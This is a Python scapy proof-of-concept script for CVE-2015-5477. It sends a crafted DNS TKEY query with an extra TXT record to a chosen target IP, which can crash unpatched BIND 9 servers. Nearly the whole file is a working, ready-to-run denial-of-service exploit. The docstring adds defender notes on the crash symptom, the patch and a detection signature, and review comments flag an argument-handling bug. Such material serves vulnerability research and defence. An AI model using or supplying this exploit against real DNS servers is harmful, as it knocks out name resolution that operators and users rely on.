#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Author : tintinweb@oststrom.com <github.com/tintinweb>

import sys
from scapy.all import *

def main():
    """Send one DNS TKEY query carrying an extra TXT record to <target.ip>.

    Command line: argv[1] is the destination IP; "--debug" anywhere in argv
    turns on scapy verbosity and dumps the packet before it is sent. With no
    arguments the usage text is printed and the process exits with status 1.

    The packet is a DNS question of type TKEY (0xf9), class ANY, with
    arcount=1 and a TXT resource record for the same name appended after the
    DNS layer. It is sent once over UDP with send(); no reply is read, so
    the " [!] pkt sent!" line and exit status 0 only mean the packet was
    handed to scapy for sending, not that the target was affected.

    Defender notes for CVE-2015-5477 (from public reporting, not from this
    file -- confirm against the ISC advisory): an affected named terminates
    on an assertion failure while handling the TKEY query, so an unexpected
    named exit with an assertion message in its log is the symptom to look
    for, and the remedy is a patched BIND release. TKEY questions (type 249)
    are typically rare in ordinary resolver traffic, so a TKEY question
    paired with a non-TKEY additional record of the same owner name is a
    usable detection signature.
    """
    # No target given: show usage and stop with a non-zero status.
    if len(sys.argv)<=1:
        print """
USAGE: %s <target.ip> [qname=.]
"""%(sys.argv[0])
        sys.exit(1)

    target = sys.argv[1]
    # NOTE(review): the condition counts how many arguments equal "--debug"
    # and compares that count with 2, so it only holds when "--debug" is
    # passed three or more times. In normal use qname is therefore always
    # "." and the optional [qname] from the usage text is not honoured.
    qname = sys.argv[2] if len([a for a in sys.argv if a=="--debug"])>2 else "."
    debug = True if "--debug" in sys.argv else False
    # A bool is assigned to scapy's verbosity setting; False presumably
    # behaves as level 0 (quiet) -- confirm against the scapy version in use.
    conf.verb = debug
    print "[ ] CVE-2015-5477 BIND 9 PoC"
    print "[i] target: %s"%target
    print " [+] sending DNSQ TKEY with additional record ..."

    # scapy messes up additional records when put into DNS(ar=..), so the
    # record is stacked after the DNS layer with "/" and arcount is set by
    # hand to announce it.
    p = DNS(rd=1, qd=DNSQR(qname=qname, 
			   qtype=0xf9 , # 0xf9 == 249, the TKEY RR type
                           qclass='ANY' ), arcount=1) / DNSRR(rrname=qname, 
                                                             type='TXT', 
                                                             rclass='ANY', 
                                                             rdata="x") 

    # Debug mode prints the layer-by-layer dissection of the built packet.
    if debug:
        p.show()

    # UDP() is left at scapy's defaults (ports are not set here); send() is
    # fire-and-forget, so nothing below inspects a response.
    send(IP(dst=target)/UDP()/p)
    print " [!] pkt sent!"
    sys.exit(0)

# Run main() only when executed as a script, never on import.
if __name__ == "__main__":
    main()
